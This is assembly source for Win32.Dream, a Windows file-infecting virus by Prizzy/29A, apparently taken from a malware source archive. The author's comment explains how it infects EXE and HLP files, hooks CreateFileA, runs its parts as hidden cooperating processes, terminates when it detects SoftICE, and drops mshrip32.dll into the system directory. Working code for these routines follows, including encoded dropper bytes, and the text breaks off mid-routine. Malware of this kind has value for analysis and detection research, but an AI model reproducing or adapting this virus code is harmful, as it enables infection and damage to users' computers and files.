MalwareSourceCode/Win32/Win32.Dream.asm

1845 lines
41 KiB
NASM
Raw Normal View History

2020-10-11 03:07:43 +00:00
;
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
; : Prizzy/29A : Win32.Dream : Prizzy/29A :
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
; Hello people, here is my third virus especially when it is designed for
; whole Win32 platform. It infects only EXE (PE - Portable Executable)
; files and also HLP (Windows Help File Format).
;
; When infected EXE file is started, EIP goes through my easy polymorphic
; engine, which isn't so important in this virus, then hooks CreateFileA
; function, installs itself into memory and only then it can put EIP to
; the host - there're two returns, one for EXE the other for HLP files.
;
; With might and mind I wanted to use only it the best from new high-tech
; vx methods we know. And I think is nothing worst than virus equipped of
; interprocess communication (IPC). I also changed my coding style and
; this source is most optimization as I could.
;
;
; Detailed Information
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
;
; 1. Interprocess Communication (IPC)
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; You could see one IPC virus (Vulcano) by Benny/29A but I used this fea-
; ture other way than he. His IPC virus is only in one process and it can
; communicate with others viruses in another process.
;
; The parts of my Win32.Dream virus work in several processes and in fact
; it behades like one whole virus. After installing to memory, virus will
; remove itself from memory of the infected program.
;
;
; 1.1. Creating processes
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; This virus is divided into seven 'independent' functions which have own
; process. To create new process I would build a dropper and via the Cre-
; ateProcessA I would run them.
;
; The dropper wait than new function for its process is ready, if yes, it
; shares two mapped blocks (OpenFileMappingA) for that process (it's Glo-
; bal memory and Function's body) and creates thread on the function. The
; process can't terminate it can only Sleep. All created processed are
; hiden in Windows 95, not in WinNT/2k (is't more complex).
;
;
; 1.2. IPC in action
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Hooked CreateFileA functions retrieves control, sets flag for certain
; process and awakes its. That process finishes own task and returns re-
; sults.
;
;
; 1.3. Global memory
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; It's necessary to share some important information among all processes.
; There are:
;
; + [thandle] : When the dropper will create new thread here is re-
; turned handle. It indicates the thread's errorcode.
; + [th_mempos] : Here is stored the name of the Function's mapped
; object. The dropper will open that memory area.
; + [process] : hProcess, ProcessID values of the all created pro-
; cesses because of opening/runing them.
; + [apiz] : The addresses of the all APIz I call are on this
; place.
; + [active] : If other process wants to run me, sets certain flag
; here and the thread tests it.
; + [paramz] : This is place where the virus store some parameters
; among processes (see below).
; + [vbody] : Here is the copy of the virus, useful for changing
; values inside and for poly engine.
; + [filename] : The future infected filename. New CreateFileA func-
; tion stores the name here.
; + [cinfected] : Two FPU memory buffers, one for creating of the in-
; fection mark the other for checking.
; + [poly_vbody] : Output from polymorphic engine.
;
;
; 1.4. Parameters
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; As I wrote above I have to get some parameters of the input processes.
; Here is the description of them:
;
; + [1st param] : Out of polymorhpic engine, the new size of the virus
; + [2nd param] : Filesize for checksum (+poly size yet).
; + [3rd param] : The name of the mapped file (for OpenFileMappingA).
; + [4th param] : a. Filesize for check_infected (without poly size).
; b. Out of checksum.
; + [5th param] : Input for check_infected, if '1', then it wants to
; get an angle for create_infected.
; + [6th param] : Terminate all processes ? (WinNT/2000 only)
; + [7th param] : Terminate all processes ? (Win95/98 only)
; (because of Win95/98 kernel bug)
;
;
; 1.5. Termination of the all processes
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; I remember it was a nut for me but of course I'd to solve it. At first
; I changed flags of the process (SetErrorMode, it means, the process 'll
; not show any message box if it will do bad instructions), then I had to
; check if the host lives yet. In Win95/98 I have discovered a kernel bug
; so that I couldn't use WinNT version (OpenProcess) to check if the host
; still exists because Win95/98 don't delete its process id handle.
; Win95 - you can only read some value the from allocated memory by host.
; WinNT - that allocated memory is opened by other process, you can't
; identify if the host still exists.
;
;
; 1.6. The scheme of the all processes
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
;
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> new CreateFileA API function <09>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
; <20>
; <09><><EFBFBD><1F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <09> infect file <09> <09><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <09><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ <20><><EFBFBD><EFBFBD> infect HLP <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <09><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
; <20>
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> <20> <20> <20><><EFBFBD> [check_infected]
; <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><07><><EFBFBD><EFBFBD>
; <20> <20> infect <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [poly_engine]
; <20><><EFBFBD><EFBFBD> <20> <20>
; <20> EXE <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [create_infected]
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><07><>Ŀ
; <20> <20> <20><><EFBFBD> [checksum]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ
;
;
; 2. Optimalization and comments
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Sometimes I heard my last virus Win32.Crypto is too huge and also some
; people had a fun from me (benny, mort - gotcha bastards!) that my next
; virus will be bigger than one megabyte. I wanted to optimize next one
; and I've not told them it so I think it'll be surprise for them I pro-
; ved. Nevertheless I've a taste of the second side and now I can return
; myself without any major problems. But now I can say the virus is more
; optimization than benny's bits and pieces. The source code is not com-
; mented enough because I think no many people will taste something like
; IPC is. If yes, they can contact me.
;
;
; 3. Check infected routine
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Long ago in Win32.Crypto I tasted to use unique math technique how to
; check if the file is infected. Now I thought up new more complex way.
; At first from infected file I'll compile the equation, for example:
; y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x
; and I'll get two points on that curve, for example x1=4 and x2=7. Then
; I will calculate what angle is between the tangents to the curve from
; that two points, it means: I have to calculate derivation y' of that
; equation and if I know y=x1 and y=x2 then I will determine:
; & = arc tg | log(x1 - x2) - log(1 + x1*x2) |
; If the angle will be greater e.g. than 75 degree, file is infected.
;
; This algorithm has been coded only for fun so that I know we've easier
; methods but I couldn't call to remembrance on any.
;
;
; 4. Pearls behind the scene
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; * Only two weeks before release I've think the virus name up at last.
; * At a time, during coding, I stopped writing and this virus I haven't
; coded for two months. Later when I started again I couldn't remember
; what that code does and so on.
; * In present exists over than fifty backup copies.
; * The worst part of the virus was the dropper, there were many changes
; because of Win9x and WinNT compatibility; many bugs were there.
; * After a hour of the coding I unwillingly deleted new version. So that
; I'd to save more than one gigabytes from FAT32 on another hard disk.
; Only there I found that lost version.
; * The best thing I like on the whole virus is main comment.
; * Working directory was 'E:\X_WIN\' and this file name was 'WIN.AS!'.
; * Last week I was looking for help on mirc
; <prizzy> i used also OpenFileMapping, but I think yes; if ...
; <Bumblebee> mmm
; <Bumblebee> OpenFileMapping?
; <prizzy> yes :)
; <Bumblebee> i've never used it [bumble~1.log, 18:59:17]
; ...but much help I haven't found there (although Bumblebee helped
; me with another bug).
; * During whole coding I've read five books and three film scripts.
;
;
; 5. List of greetings
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Darkman The master of the good optimistic mood
; Bumblebee Thanks for your help during coding
; Billy Belcebu So, our communication has started yet
; GriYo All the time busy man
; Lord Julus Waiting for your new virus and its meta engine
; Mort So did you think this source will be bigger then
; one megabytes? Sorry, maybe later :).
; J.P. I look forward on future with you, dude.
; Ratter No, no. Stop reading and let you show us what you
; are hiding inside.
; VirusBuster Here is that secret bin with savage poly engine as
; you wrote on #virus.
; Benny It the best in the end, benny. Haha, at last this
; source is optimized and you will stop to worry me.
; Thanks for all you have e'er done for me.
; ...and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
; 6. Contact me
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; prizzy@coderz.net
; http://prizzy.cjb.net
;
;
; (c)oded by Prizzy/29A, June 2000
;
;
.486p
.model flat,STDCALL
locals
include include\mz.inc
include include\pe.inc
extrn ExitProcess:proc
extrn CreateFileA:proc
extrn MessageBoxA:proc
;<3B><>Ĵ prepare to program start <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
.data
db ?
.code
;<3B><>Ĵ virus code starts here <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
vstart proc
pusha
call $+5
pop ebp
sub ebp,$-vstart-1 ;get delta
vsize equ file_end - vstart
mov eax,[esp+vsize+32]
sub eax,1000h
inf_ep equ $-4
mov [ebp+ha_module-vstart],eax
add eax,fg0 - vstart + 1000h
org_ep equ $-4 ;get startup address
push eax
call get_k32_apis
jmp __return
@anti_e:
call kill_st
call check_resident ;try to create it
call create_process_maps
.if byte ptr [ebp+error-vstart] == 0
call hookapi
.endif
__return:
pop dword ptr [esp+28]
popa
sub esp,-vsize-4
db 90h,90h
jmp eax ;exe back
xor eax,eax ;hlp back
ret 8
vstart endp
get_k32_apis proc
push 20
mov eax,[esp+vsize+48] ;find k32 address
sub ax,ax
pop ecx
@@1:.if word ptr [eax] != 'ZM'
sub eax,65536
loop @@1
jmp gk32a_f_a
.endif
cmp byte ptr [ebp+__return+11-vstart],90h
jz $+5
pop eax
jmp __return
push eax eax ;get k32 tables
add eax,[eax+60]
pop ebx edi
add ebx,[eax+78h]
mov cl,0
@@3:push ebx ecx
mov edx,[ebx+32]
add edx,edi
@@4:mov esi,[edx] ;calculate next crc32 func.
add esi,edi
push ecx edx ebx ;crc32 algorithm
stc
sbb ecx,ecx
mov edx,ecx
@@4_crc32_nByte:
sub eax,eax
sub ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
@@4_crc32_nBit:
shr bx,1
rcr ax,1
jnc @@4_crc32_no
xor ax,08320h
xor bx,0edb8h
@@4_crc32_no:
dec dh
jnz @@4_crc32_nBit
xor ecx,eax
xor edx,ebx
cmp byte ptr [esi-1],0
jnz @@4_crc32_nByte
@@4_crc32_fin:
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx ecx
cmp [ebp+k32_crcs+ecx*4-vstart],eax ;crc32 == my func ?
jz @@5
sub edx,-4
jmp @@4
gk32a_f_a:
jmp gk32a_f
@@3_a:
jmp @@3
@@5:sub edx,[ebx+32] ;get addr of the new func.
sub edx,edi
shr edx,1
add edx,[ebx+36]
add edx,edi
movzx edx,word ptr [edx]
shl edx,2
add edx,[ebx+28]
mov edx,[edx+edi]
add edx,edi
pop ecx ebx
movzx eax,word ptr [ebp+ecx*2+k32_addrs-vstart]
neg ax
mov [ebp+eax],edx ;store its
@@5a:inc ecx
mov eax,edi
rol eax,8
sub al,0BFh
jz @@5b
cmp ecx,14
jz @@5a
@@5b:cmp ecx,count
jnz @@3_a
push p_number+1 ;update Sleep function
pop ecx
@@6:movzx eax,word ptr [ebp+process_maps+ecx*2-vstart-2]
neg ax
mov [ebp+eax+2],edx
@@7:loop @@6
test al,0C3h
gk32a_f equ $-1
pop eax
push cs ;anti-emulator
lea eax,[ebp+@anti_e-vstart]
push eax
retf
get_k32_apis endp
kill_st proc
call @sNT+10
@s95:db '\\.\SICE',0 ;name drivers
@sNT:db '\\.\NTICE',0
pop ebx
call open_file ;open SoftICE 95/98 or
jz @ks_nt ; SoftICE NT/2k driver
dec eax
push eax
mov eax,0
lpCloseHandle equ $-4
call eax
jmp @ks_kill ;kill process
@ks_nt:
sub ebx,@s95-@sNT ;open the second driver
call open_file
jz @ks_dos
dec eax
call [ebp+lpCloseHandle-vstart]
@ks_kill:
push eax
mov eax,0
lpExitProcess equ $-4
call eax
@ks_dos:
cmp dword ptr fs:[32],0 ;TD32 etc.
jnz @ks_kill
ret
open_always_file:
sub eax,eax ;create file always
push eax ;useful for droppers
mov cl,80h
push ecx 2
jmp $+8
open_file:
sub eax,eax ;open file in ebx
push eax edx 3
cdq
mov dl,0C0h
bswap edx
push eax eax edx ebx
mov eax,0
lpCreateFile equ $-4
call eax
inc eax
ret
kill_st endp
check_resident proc
push ebp 1 0 ;create mutex or get if it
mov eax,0 ;has been created => in mem
lpCreateMutexA equ $-4
call eax
xchg eax,ebx
mov eax,0
lpGetLastError equ $-4
call eax
xchg eax,esi
or esi,esi
jz @cr_f
push ebx
mov eax,0
lpReleaseMutex equ $-4
call eax
@cr_f:or esi,esi
pop eax
jnz __return
jmp eax
check_resident endp
create_process_maps proc
mov byte ptr [ebp+error-vstart],1
call build_dropper ;create dropper in sys dir
jc cpm_fnodeal
mov eax,0
lpGetCurrentProcessId equ $-4
call eax
mov [ebp+if_parent-vstart],eax
sub ebx,ebx
push 80h
cpm_shared_mem equ $-4
push 7
mov eax,0
lpSetErrorMode equ $-4
call eax
pop ecx
lea edi,[ecx+vbody]
push ecx
mov esi,ebp
mov ecx,vsize
rep movsb
cpm_nxproc:
pop eax
lea edi,[eax+8+ebx*8]
push eax
mov [eax],edi
call @@1
dd 0,0,0,0 ;hProc, hThr, ProcID, ThrID
@@1:pop esi
lea eax,[ebp+vsize]
push esi eax 68
pop ecx
@@1a:mov [eax],ch
inc eax
loop @@1a
push ecx ecx 640 1 ecx ecx 80h ecx
cpm_cmdline equ $-5
inc ecx
mov dword ptr [eax-6*4],ecx
mov eax,0
lpCreateProcessA equ $-4
call eax
or eax,eax
jz cpm_failed
lodsd ;get hProcess and ProcessID
stosd
lodsd
lodsd
mov edx,eax
stosd
movzx esi,word ptr [ebp+process_maps+ebx*2-vstart]
neg si
add esi,ebp
movzx ecx,word ptr [esi-2]
mov eax,4096
call malloc
xchg eax,edi
rep movsb ;copy one to mem
pop esi
push esi
movzx eax,byte ptr [ebp+m_sign-2-vstart]
mov [esi+4],eax ;thread memory sign
mov [esi],ecx ;active flag
push esi count-2
lea edi,[esi+apiz]
lea esi,[ebp+k32_addrs-vstart]
pop ecx
@@2:sub eax,eax
lodsw
neg ax
mov eax,[ebp+eax]
stosd
loop @@2
pop esi
push edx ecx 1F0FFFh
mov eax,0
lpRegisterServiceProcess equ $-4
or eax,eax
jz cpm_winnt
push 1 edx
call eax
cpm_winnt:
mov eax,0
lpOpenProcess equ $-4 ;create inside thread from
call eax ;the dropper
xchg eax,ecx
jecxz cpm_failed
mov edx,0
lpWaitForSingleObject equ $-4
call edx, ecx, 40
lodsd
not eax
xchg eax,ecx
jecxz cpm_failed
inc ebx
cmp bl,p_number
jnz cpm_nxproc
mov al,bh ;remove the virus from the
mov ecx,(mem_end - newCreateFile) ;current file, live on the
lea edi,[ebp+newCreateFile-vstart] ;other places inside win32
rep stosb
mov byte ptr [ebp+error-vstart],cl
cpm_failed:
pop eax
or ebx,ebx
jnz cpm_fnodeal
call mdealloc
cpm_fnodeal:
mov eax,[ebp+cpm_cmdline-vstart]
mdealloc:
push eax ;deallocate shared memory
mov eax,0
lpUnMapViewOfFile equ $-4
call eax
ret
error db 0
create_process_maps endp
build_dropper proc
mov eax,260 ;generate dropper filename
call malloc
mov [ebp+cpm_cmdline-vstart],eax
mov edi,eax
push 7Fh eax ;no more then 0x80 chars
mov eax,0
lpGetSystemDirectory equ $-4
call eax ;get system directory
or eax,eax
jz bd_failed
call bd_fname
db '\mshrip32.dll',0 ;hmmm, my dropper name
bd_fname:
pop esi
push 14
mov ebx,edi
add edi,eax
pop ecx
rep movsb
call open_always_file ;create its
jz bd_failed
dec eax
push eax
mov esi,1024 ;alloc memory for dropper
call malloc
xchg eax,edi ;edi=output, all is zero
mov eax,60000
push edi
lea esi,[ebp+dropper_data-vstart]
call malloc
xchg ebx,eax
mov [ebp+cpm_shared_mem-vstart],ebx
mov eax,0
lpGetVersion equ $-4
call eax
xor ecx,ecx
bt eax,63
adc edi,ecx
mov [ebx+paramz+(7-1)*4],edi
pop edi
push edi
mov al,[ebp+m_sign-2-vstart]
mov [esi+224],al ;noone knows what is it
bd_read: ;create EXE PE dropper
xor eax,eax
lodsb
cmp al,-1 ;end of data?
jz bd_done
add edi,eax ;next movement
lodsb
xchg eax,ecx
bd_write:
lodsb
stosb ;save data
loop bd_write
jmp bd_read
E8 equ 0E8
bd_done:
push 0
call @@2
dd ?
@@2:push 1024
push dword ptr [esp+12] ;droppers body
push dword ptr [esp+20] ;file handle
mov eax,0
lpWriteFile equ $-4
call eax
push eax dword ptr [esp+8]
call [ebp+lpCloseHandle-vstart]
pop ecx eax eax ;write error ?
jecxz bd_failed
test al,0F9h
bd_failed equ $-1
ret
radix 16 ;compressed [dropper EXE(PE) 1024 bytes]
dropper_data equ this byte
db 0,5,4Dh,5A,90,0,3,3,1,4,3,2,0FF,0FF,2,1,0B8,7,1,40,23,1,0C0,83,2
db 50,45,2,8,4C,1,1,0,7F,6A,4,38,8,7,0E0h,0,0Fh,1,0Bh,1,6,6,1,2,6,2
db 0C,10,3,1,10,3,1,10,4,1,40,2,1,10,3,1,2,2,1,4,7,1,4,8,1,20,3,1,2
db 2,2,0E6,3Bh,2,1,2,5,1,10,2,1,10,4,1,10,2,1,10,6,1,10,0Bh,2,88,10
db 2,1,28,54,1,10,2,1,8,1Bh,4,2Eh,32,39,41,4,1,0C8,4,1,10,3,1,2,3,1
db 2,0E,1,40,2,1,0C0,20,2,0B8h,10,0A,7E,0E8,45,0,0,0,96,0E8,0,0,0,0
db 5Dh,89,75,9,0EBh,2,90,90,0BBh,0,0,0,0,83,3Bh,0,75,1E,66,0C7,45,6
db 0EBh,28,0E8,1E,0,0,0,33,0C9,53,51,53,50,51,51,0B8,0,0,0,0,-1,0D0
db 0F7,0D0,89,3,6A,0A,0B8,0,0,0,0,0FF,0D0h,0EBh,0CBh,0ADh,56,0EBh,7
db 0E8,2,0,0,0,41,0,33,0F6,0BF,1F,0,0F,0,6A,1,57,0B8,0,0,0,0,-1,0D0
db 56,56,56,57,50,0B9,0,0,0,0,-1,0D1,0C3,E8,0,0,0,0,-1,25,0,10,40,0
db 0,0,0B0,10,0A,2,0BEh,10,3,1,10,16,2,0B8,10,6,0Fh,96,1,50,69,65,0
db 47,44,49,33,32,2E,64,6C,6C,0FF
radix 10
build_dropper endp
malloc proc
pusha ;allocate shared memory
xchg ebx,eax
sub esi,esi
inc byte ptr [ebp+m_sign-2-vstart]
call m_sign
db "@",0
m_sign:
push ebx esi 4 esi 0-1
mov eax,0
lpCreateFileMappingA equ $-4
call eax
dec eax
jz m_failed
inc eax
push ebx esi esi 2 eax
mov eax,0
lpMapViewOfFile equ $-4
call eax
m_failed:
mov [esp+28],eax
popa
or eax,eax
ret
malloc endp
hookapi proc
mov ebx,0
ha_module equ $-4
cmp word ptr [ebx],'ZM'
jnz ha_failed
movzx esi,word ptr [ebx+60]
add esi,ebx
cmp word ptr [esi],'EP'
jnz ha_failed
mov eax,[esi+80h]
add eax,ebx
fk32:mov esi,eax
mov esi,[esi+12]
cmp [esi+ebx],'NREK'
jz fkok
sub eax,-20
jmp fk32
fkok:mov edx,[eax+16]
add edx,ebx
cmp dword ptr [eax],0
jz ha_failed
push edx
mov esi,[eax]
add esi,ebx
mov edx,esi
sub eax,eax
fklp:cmp dword ptr [edx],0
jz ha_failed2
cmp dword ptr [edx+3],80h
jz finc
mov esi,[edx]
lea esi,[esi+ebx+2]
call fnam
db "CreateFileA",0
fnam:pop edi
fcom:push 12
pop ecx
repe cmpsb
jecxz fapi
finc:inc eax
sub edx,-4
jmp fklp
fapi:shl eax,2
add eax,[esp]
xchg ebx,eax
mov eax,[ebx]
mov ecx,[ebp+cpm_shared_mem-vstart]
mov [ecx+vbody+newCreateFile+1-vstart],eax
lea eax,[ecx+vbody+newCreateFile-vstart]
mov [ebx],eax
pop ecx
ret
ha_failed2:
pop eax
ha_failed:
pop eax
jmp __return
hookapi endp
db " Win32.Dream, (c)oded by Prizzy/29A ",13,10
db " The greetz go to all 29A vx coderz ",13,10
newCreateFile proc
push 80h
oldCreateFile equ $-4
pusha
call $+5
pop ebp
sub ebp,$-vstart-1
mov ebx,[ebp+cpm_shared_mem-vstart]
lea edi,[ebx+vbody+vsize]
mov word ptr [edi-vsize+__return+11-vstart],9090h
mov esi,[esp+7*4+12]
ncfc:lodsb
stosb
or al,al
jnz ncfc
lea edi,[ebx+active]
lea esi,[ebx+process] ;infect_file hProcess, ProcID
lodsd
xchg ebx,eax
lodsd
mov byte ptr [edi],1 ;active thread
push eax 0 1F0FFFh
call [ebp+lpOpenProcess-vstart]
xchg eax,ecx
jecxz ncf_failed
ncfw:push 40 ebx
call [ebp+lpWaitForSingleObject-vstart]
